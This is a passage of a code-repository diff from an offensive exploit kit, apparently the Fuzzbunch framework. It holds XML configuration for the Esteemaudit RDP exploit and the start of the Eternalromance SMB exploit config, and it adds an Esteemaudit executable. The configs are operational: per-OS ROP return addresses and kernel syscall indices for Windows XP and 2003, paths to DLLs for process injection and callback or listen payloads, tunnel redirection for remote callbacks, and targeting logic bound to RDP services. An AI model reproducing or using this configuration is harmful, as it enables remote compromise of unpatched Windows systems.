<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret40' description=''>
|
||||
<default>0x0fe266b8</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret44' description=''>
|
||||
<default>0x00004000</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='sysenterIndex' description=''>
|
||||
<default>0x00000089</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='jmpEbx' description=''>
|
||||
<default>0x0fe3342a</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='sizeOffest' description=''>
|
||||
<default>0x44</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='secondStageAddress' description=''>
|
||||
<default>0x0FE372B0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='provContAddress' description=''>
|
||||
<default>0x0FF94DB0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='scardTransmitAddress' description=''>
|
||||
<default>0x0FE21178</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='scardT0PciAddress' description=''>
|
||||
<default>0x0FE211A8</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='KiServiceTable_NtAllocateVirtualMemory_Index' description='Index of NtAllocateVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x00000011</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U16' name='KiServiceTable_NtAllocateVirtualMemory_ArgSize' description='Size of stack arguments to NtAllocateVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x18</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='KiServiceTable_NtFreeVirtualMemory_Index' description='Index of NtFreeVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x00000053</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U16' name='KiServiceTable_NtFreeVirtualMemory_ArgSize' description='Size of stack arguments to NtFreeVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x10</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='XPSP2|3' description='Windows XP SP2 or SP3'>
|
||||
<parameter hidden='true' type='U32' name='GlobalBufAddr' description=''>
|
||||
<default>0x0fe370b0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret0c' description=''>
|
||||
<default>0x0fe25158</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret10' description=''>
|
||||
<default>0x0fe2ab2d</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret04' description=''>
|
||||
<default>0x0fe27243</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret08' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret20' description=''>
|
||||
<default>0x0fe27243</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret28' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret40' description=''>
|
||||
<default>0x0fe266b8</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret44' description=''>
|
||||
<default>0x00004000</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='sysenterIndex' description=''>
|
||||
<default>0x00000089</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='jmpEbx' description=''>
|
||||
<default>0x0fe3342a</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='sizeOffest' description=''>
|
||||
<default>0x44</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='secondStageAddress' description=''>
|
||||
<default>0x0FE372B0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='provContAddress' description=''>
|
||||
<default>0x0FF94DB0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='scardTransmitAddress' description=''>
|
||||
<default>0x0FE21178</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='scardT0PciAddress' description=''>
|
||||
<default>0x0FE211A8</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='KiServiceTable_NtAllocateVirtualMemory_Index' description='Index of NtAllocateVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x00000011</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U16' name='KiServiceTable_NtAllocateVirtualMemory_ArgSize' description='Size of stack arguments to NtAllocateVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x18</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='KiServiceTable_NtFreeVirtualMemory_Index' description='Index of NtFreeVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x00000053</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U16' name='KiServiceTable_NtFreeVirtualMemory_ArgSize' description='Size of stack arguments to NtFreeVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x10</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='W2K3SP0' description='Windows 2003 SP0'>
|
||||
<parameter hidden='true' type='U32' name='GlobalBufAddr' description=''>
|
||||
<default>0x0fe380f8</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret0c' description=''>
|
||||
<default>0x0fe38168</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret10' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret04' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret08' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret20' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret28' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret40' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret44' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='sysenterIndex' description=''>
|
||||
<default>0x0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='jmpEbx' description=''>
|
||||
<default>0x0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='sizeOffest' description=''>
|
||||
<default>0x0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='secondStageAddress' description=''>
|
||||
<default>0x0FE382F8</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='provContAddress' description=''>
|
||||
<default>0x0FF95DF8</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='scardTransmitAddress' description=''>
|
||||
<default>0x0FE211B4</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='scardT0PciAddress' description=''>
|
||||
<default>0x0FE211A8</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='KiServiceTable_NtAllocateVirtualMemory_Index' description='Index of NtAllocateVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x00000012</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U16' name='KiServiceTable_NtAllocateVirtualMemory_ArgSize' description='Size of stack arguments to NtAllocateVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x18</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='KiServiceTable_NtFreeVirtualMemory_Index' description='Index of NtFreeVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x00000057</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U16' name='KiServiceTable_NtFreeVirtualMemory_ArgSize' description='Size of stack arguments to NtFreeVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x10</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='W2K3SP1' description='Windows 2003 SP1'>
|
||||
<parameter hidden='true' type='U32' name='GlobalBufAddr' description=''>
|
||||
<default>0x080190D8</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret0c' description=''>
|
||||
<default>0x08005e85</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret10' description=''>
|
||||
<default>0x0800bedd</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret04' description=''>
|
||||
<default>0x08011e7a</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret08' description=''>
|
||||
<default>0x0801118e</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret20' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret28' description=''>
|
||||
<default>0x08011fef</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret40' description=''>
|
||||
<default>0x00004000</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret44' description=''>
|
||||
<default>0x080128cc</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='sysenterIndex' description=''>
|
||||
<default>0x0000008f</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='jmpEbx' description=''>
|
||||
<default>0x08015074</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='sizeOffest' description=''>
|
||||
<default>0x40</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='secondStageAddress' description=''>
|
||||
<default>0x080192D8</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='provContAddress' description=''>
|
||||
<default>0x08176DD8</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='scardTransmitAddress' description=''>
|
||||
<default>0x0800119C</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='scardT0PciAddress' description=''>
|
||||
<default>0x080011CC</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='KiServiceTable_NtAllocateVirtualMemory_Index' description='Index of NtAllocateVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x00000012</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U16' name='KiServiceTable_NtAllocateVirtualMemory_ArgSize' description='Size of stack arguments to NtAllocateVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x18</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='KiServiceTable_NtFreeVirtualMemory_Index' description='Index of NtFreeVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x00000057</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U16' name='KiServiceTable_NtFreeVirtualMemory_ArgSize' description='Size of stack arguments to NtFreeVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x10</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='W2K3SP2' description='Windows 2003 SP2'>
|
||||
<parameter hidden='true' type='U32' name='GlobalBufAddr' description=''>
|
||||
<default>0x080190D8</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret0c' description=''>
|
||||
<default>0x08005e85</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret10' description=''>
|
||||
<default>0x0800bedd</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret04' description=''>
|
||||
<default>0x08011e7a</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret08' description=''>
|
||||
<default>0x0801118e</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret20' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret28' description=''>
|
||||
<default>0x08011fef</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret40' description=''>
|
||||
<default>0x00004000</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret44' description=''>
|
||||
<default>0x080128cc</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='sysenterIndex' description=''>
|
||||
<default>0x0000008f</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='jmpEbx' description=''>
|
||||
<default>0x08015074</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='sizeOffest' description=''>
|
||||
<default>0x40</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='secondStageAddress' description=''>
|
||||
<default>0x080192D8</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='provContAddress' description=''>
|
||||
<default>0x08176DD8</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='scardTransmitAddress' description=''>
|
||||
<default>0x0800119C</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='scardT0PciAddress' description=''>
|
||||
<default>0x080011CC</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='KiServiceTable_NtAllocateVirtualMemory_Index' description='Index of NtAllocateVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x00000012</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U16' name='KiServiceTable_NtAllocateVirtualMemory_ArgSize' description='Size of stack arguments to NtAllocateVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x18</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='KiServiceTable_NtFreeVirtualMemory_Index' description='Index of NtFreeVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x00000057</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U16' name='KiServiceTable_NtFreeVirtualMemory_ArgSize' description='Size of stack arguments to NtFreeVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x10</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='W2K3SP1|2' description='Windows 2003 SP1 or SP2'>
|
||||
<parameter hidden='true' type='U32' name='GlobalBufAddr' description=''>
|
||||
<default>0x080190D8</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret0c' description=''>
|
||||
<default>0x08005e85</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret10' description=''>
|
||||
<default>0x0800bedd</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret04' description=''>
|
||||
<default>0x08011e7a</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret08' description=''>
|
||||
<default>0x0801118e</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret20' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret28' description=''>
|
||||
<default>0x08011fef</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret40' description=''>
|
||||
<default>0x00004000</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret44' description=''>
|
||||
<default>0x080128cc</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='sysenterIndex' description=''>
|
||||
<default>0x0000008f</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='jmpEbx' description=''>
|
||||
<default>0x08015074</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='sizeOffest' description=''>
|
||||
<default>0x40</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='secondStageAddress' description=''>
|
||||
<default>0x080192D8</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='provContAddress' description=''>
|
||||
<default>0x08176DD8</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='scardTransmitAddress' description=''>
|
||||
<default>0x0800119C</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='scardT0PciAddress' description=''>
|
||||
<default>0x080011CC</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='KiServiceTable_NtAllocateVirtualMemory_Index' description='Index of NtAllocateVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x00000012</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U16' name='KiServiceTable_NtAllocateVirtualMemory_ArgSize' description='Size of stack arguments to NtAllocateVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x18</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='KiServiceTable_NtFreeVirtualMemory_Index' description='Index of NtFreeVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x00000057</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U16' name='KiServiceTable_NtFreeVirtualMemory_ArgSize' description='Size of stack arguments to NtFreeVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x10</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
</paramchoice>
|
||||
</paramgroup>
|
||||
<paramgroup name='x86 64-bit' description='Target is running on an x86 64-bit processor'>
|
||||
<parameter type='LocalFile' name='MigrateProcessDLL' description=' The DLL that will be used to inject into a remote process'>
|
||||
<default>D:\DSZOPSDISK\storage\rudo_x64.dll</default>
|
||||
</parameter>
|
||||
<parameter type='LocalFile' name='CallbackPayloadDLL' description='The DLL that will be used as a callback payload'>
|
||||
<default>D:\DSZOPSDISK\storage\capa_x64.dll</default>
|
||||
</parameter>
|
||||
<parameter type='LocalFile' name='ListenPayloadDLL' description='The DLL that will be used as a listen payload'>
|
||||
<default>D:\DSZOPSDISK\storage\lipa_x64.dll</default>
|
||||
</parameter>
|
||||
<paramchoice name='Target' description='Suspected OS and language pack'>
|
||||
<default>Other|64</default>
|
||||
<paramgroup name='Eng|Jpn|64' description='English/Japanese 64-bit XP/2003'>
|
||||
<parameter hidden='true' type='U32' name='GlobalBufAddr' description=''>
|
||||
<default>0x0FDC9870</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret0c' description=''>
|
||||
<default>0x0FDBE483</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret10' description=''>
|
||||
<default>0x0FDC28CC</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret04' description=''>
|
||||
<default>0x0FDB0EDC</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret08' description=''>
|
||||
<default>0x0FDC2BE7</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret20' description=''>
|
||||
<default>0x0FDBC9C9</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret28' description=''>
|
||||
<default>0x0fdbbe19</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret40' description=''>
|
||||
<default>0x00004000</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret44' description=''>
|
||||
<default>0x0fdbd72d</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='sysenterIndex' description=''>
|
||||
<default>0x0FF5E2B0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='jmpEbx' description=''>
|
||||
<default>0x0fda43fa</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='sizeOffest' description=''>
|
||||
<default>0x0fdb9c6d</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='secondStageAddress' description=''>
|
||||
<default>0x0FDC9A70</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='provContAddress' description=''>
|
||||
<default>0x0FF5D170</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='scardTransmitAddress' description=''>
|
||||
<default>0x0FDA1388</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='scardT0PciAddress' description=''>
|
||||
<default>0x0FDA1370</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='Other|64' description="Other languages' 64-bit XP/2003">
|
||||
<parameter hidden='true' type='U32' name='GlobalBufAddr' description=''>
|
||||
<default>0x0FDA9870</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret0c' description=''>
|
||||
<default>0x0FD9E483</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret10' description=''>
|
||||
<default>0x0FDA28CC</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret04' description=''>
|
||||
<default>0x0FD90EDC</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret08' description=''>
|
||||
<default>0x0FDA2BE7</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret20' description=''>
|
||||
<default>0x0FD9C9C9</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret28' description=''>
|
||||
<default>0x0fd9be19</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret40' description=''>
|
||||
<default>0x00004000</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret44' description=''>
|
||||
<default>0x0fd9d72d</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='sysenterIndex' description=''>
|
||||
<default>0x0FF3E2B0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='jmpEbx' description=''>
|
||||
<default>0x0fd843fa</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='sizeOffest' description=''>
|
||||
<default>0x0fd99c6d</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='secondStageAddress' description=''>
|
||||
<default>0x0FDA9A70</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='provContAddress' description=''>
|
||||
<default>0x0FF3D170</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='scardTransmitAddress' description=''>
|
||||
<default>0x0FD81388</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='scardT0PciAddress' description=''>
|
||||
<default>0x0FD81370</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
</paramchoice>
|
||||
</paramgroup>
|
||||
</paramchoice>
|
||||
</inputparameters>
|
||||
<outputparameters>
|
||||
<paramchoice name='Contract' description='The contract fulfilled by this plugin'>
|
||||
<value>StagedUpload</value>
|
||||
<paramgroup name='StagedUpload' description=''>
|
||||
<parameter type='Socket' name='ConnectedTcp' description='The connected socket'/>
|
||||
<parameter type='U8' name='XorMask' description='Masking byte'/>
|
||||
</paramgroup>
|
||||
</paramchoice>
|
||||
</outputparameters>
|
||||
<redirection>
|
||||
<local protocol='TCP' name='Launch Tunnel' listenport='TargetPort' listenaddr='TargetIp' closeoncompletion='true' destaddr='TargetIp' destport='TargetPort'/>
|
||||
<local protocol='TCP' name='Callin Tunnel' listenport='CallinPort' listenaddr='TargetIp' closeoncompletion='false' destaddr='TargetIp' destport='ListenPort'/>
|
||||
<remote listenport='CallbackPort' protocol='TCP' name='Callback Tunnel' listenaddr='CallbackIp' destport='CallbackLocalPort'/>
|
||||
</redirection>
|
||||
<logic>
|
||||
<and>
|
||||
<service name='rdp'>
|
||||
<bindtopath path="//service[name='rdp']/port" name='TargetPort'/>
|
||||
</service>
|
||||
<or>
|
||||
<os servicepack='0' name='Windows XP' family='windows' architecture='x86 32-bit'>
|
||||
<bindtovalue name='Target' value='XPSP0'/>
|
||||
</os>
|
||||
<os servicepack='1' name='Windows XP' family='windows' architecture='x86 32-bit'>
|
||||
<bindtovalue name='Target' value='XPSP1'/>
|
||||
</os>
|
||||
<os servicepack='1' name='Windows XP' family='windows' architecture='x86 32-bit'>
|
||||
<bindtovalue name='Target' value='XPSP0|1'/>
|
||||
</os>
|
||||
<os servicepack='2' name='Windows XP' family='windows' architecture='x86 32-bit'>
|
||||
<bindtovalue name='Target' value='XPSP2'/>
|
||||
</os>
|
||||
<os servicepack='3' name='Windows XP' family='windows' architecture='x86 32-bit'>
|
||||
<bindtovalue name='Target' value='XPSP3'/>
|
||||
</os>
|
||||
<os servicepack='3' name='Windows XP' family='windows' architecture='x86 32-bit'>
|
||||
<bindtovalue name='Target' value='XPSP2|3'/>
|
||||
</os>
|
||||
<os servicepack='0' name='Windows 2003' family='windows' architecture='x86 32-bit'>
|
||||
<bindtovalue name='Target' value='W2K3SP0'/>
|
||||
</os>
|
||||
<os servicepack='1' name='Windows 2003' family='windows' architecture='x86 32-bit'>
|
||||
<bindtovalue name='Target' value='W2K3SP1'/>
|
||||
</os>
|
||||
<os servicepack='2' name='Windows 2003' family='windows' architecture='x86 32-bit'>
|
||||
<bindtovalue name='Target' value='W2K3SP2'/>
|
||||
</os>
|
||||
<os servicepack='0' name='Windows XP' family='windows' architecture='x86 64-bit'>
|
||||
<bindtovalue name='Target' value='XP|2K3|64'/>
|
||||
</os>
|
||||
<os servicepack='1' name='Windows XP' family='windows' architecture='x86 64-bit'>
|
||||
<bindtovalue name='Target' value='XP|2K3|64'/>
|
||||
</os>
|
||||
<os servicepack='2' name='Windows XP' family='windows' architecture='x86 64-bit'>
|
||||
<bindtovalue name='Target' value='XP|2K3|64'/>
|
||||
</os>
|
||||
<os servicepack='3' name='Windows XP' family='windows' architecture='x86 64-bit'>
|
||||
<bindtovalue name='Target' value='XP|2K3|64'/>
|
||||
</os>
|
||||
<os servicepack='0' name='Windows 2003' family='windows' architecture='x86 64-bit'>
|
||||
<bindtovalue name='Target' value='XP|2K3|64'/>
|
||||
</os>
|
||||
<os servicepack='1' name='Windows 2003' family='windows' architecture='x86 64-bit'>
|
||||
<bindtovalue name='Target' value='XP|2K3|64'/>
|
||||
</os>
|
||||
<os servicepack='2' name='Windows 2003' family='windows' architecture='x86 64-bit'>
|
||||
<bindtovalue name='Target' value='XP|2K3|64'/>
|
||||
</os>
|
||||
</or>
|
||||
<bindtopath path='//identifier' name='TargetIp'/>
|
||||
<bindtovalue name='Payload' value='Callback'/>
|
||||
</and>
|
||||
</logic>
|
||||
</config>
|
||||
BIN
windows/exploits/Esteemaudit-2.1.0.exe
Normal file
BIN
windows/exploits/Esteemaudit-2.1.0.exe
Normal file
Binary file not shown.
22
windows/exploits/Esteemaudit-2.1.0.fb
Normal file
22
windows/exploits/Esteemaudit-2.1.0.fb
Normal file
|
|
@ -0,0 +1,22 @@
|
|||
<?xml version="1.0"?>
|
||||
<t:config id="2a7d82545aa7bdf8b44ee403dbebf2b360f55b3a"
|
||||
name="Esteemaudit"
|
||||
version="2.1.0"
|
||||
xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'
|
||||
xmlns:t='tc0'>
|
||||
|
||||
<t:touchlist>
|
||||
<t:plugin name="Esteemaudittouch"
|
||||
displayname="ESAU Vulnerability Touch"
|
||||
description="Check if Target is vulnerable to ESAU"
|
||||
postmessage="ESAU requires vulnerable target">
|
||||
<t:ivparam name="TargetPort" value="TargetPort"/>
|
||||
<t:ivparam name="TargetIp" value="TargetIp"/>
|
||||
<t:ivparam name="NetworkTimeout" value="NetworkTimeout"/>
|
||||
<t:ivparam name="PacketTimeout" value="PacketTimeout"/>
|
||||
<t:oparam name="Architecture" value="Architecture"/>
|
||||
<t:oparam name="Target" value="Target"/>
|
||||
<t:oparam name="RdpLibHertz" value="RdpLibHertz"/>
|
||||
</t:plugin>
|
||||
</t:touchlist>
|
||||
</t:config>
|
||||
455
windows/exploits/Eternalromance-1.3.0.0.xml
Normal file
455
windows/exploits/Eternalromance-1.3.0.0.xml
Normal file
|
|
@ -0,0 +1,455 @@
|
|||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
<config xmlns="urn:trch"
|
||||
id="7fca44399ae06e52cb50bfdf9ce6bd0f2ed5d28b"
|
||||
name="Eternalromance"
|
||||
version="1.3.0"
|
||||
configversion="1.3.0.0"
|
||||
schemaversion="2.0.0">
|
||||
<inputparameters>
|
||||
<!-- All plugins that perform blocking network calls must have a NetworkTimeout
|
||||
parameter or its equivalent -->
|
||||
<parameter name="NetworkTimeout"
|
||||
description="Timeout for blocking network calls (in seconds). Use -1 for no timeout."
|
||||
type="S16">
|
||||
<default>60</default>
|
||||
</parameter>
|
||||
<parameter name="TargetIp"
|
||||
description="Target IP Address"
|
||||
type="IPv4"/>
|
||||
<parameter name="TargetPort" description="Target TCP port" type="TcpPort">
|
||||
<default>445</default>
|
||||
</parameter>
|
||||
<parameter name="MaxExploitAttempts"
|
||||
description="Number of tries to exploit. Default 3"
|
||||
type="U32"
|
||||
hidden="true">
|
||||
<default>3</default>
|
||||
</parameter>
|
||||
<parameter name="PipeName"
|
||||
description="The named pipe to use"
|
||||
type="String">
|
||||
</parameter>
|
||||
|
||||
<paramchoice name="ExploitMethod" description="Which exploit method to use">
|
||||
<default>Default</default>
|
||||
|
||||
<paramgroup name="Default" description="Use the best exploit method(s) for the target OS">
|
||||
<parameter name="ExploitMethodChoice" type="U32" hidden="true" description="">
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
|
||||
<paramgroup name="Fish-in-a-barrel" description="Most reliable exploit method (XP/2k3 only)">
|
||||
<parameter name="ExploitMethodChoice" type="U32" hidden="true" description="">
|
||||
<default>1</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
|
||||
<paramgroup name="Matched-pairs" description="Next reliable exploit method (XP/Win7/2k8R2 only)">
|
||||
<parameter name="ExploitMethodChoice" type="U32" hidden="true" description="">
|
||||
<default>2</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
|
||||
<paramgroup name="Classic-Romance" description="Original LargePageGroom exploit method (All OS Versions)">
|
||||
<parameter name="ExploitMethodChoice" type="U32" hidden="true" description="">
|
||||
<default>3</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
|
||||
</paramchoice>
|
||||
|
||||
<paramchoice name="Credentials" description="Type of credentials to use">
|
||||
<default>Anonymous</default>
|
||||
|
||||
<paramgroup name="Anonymous" description="Anonymous (NULL session)">
|
||||
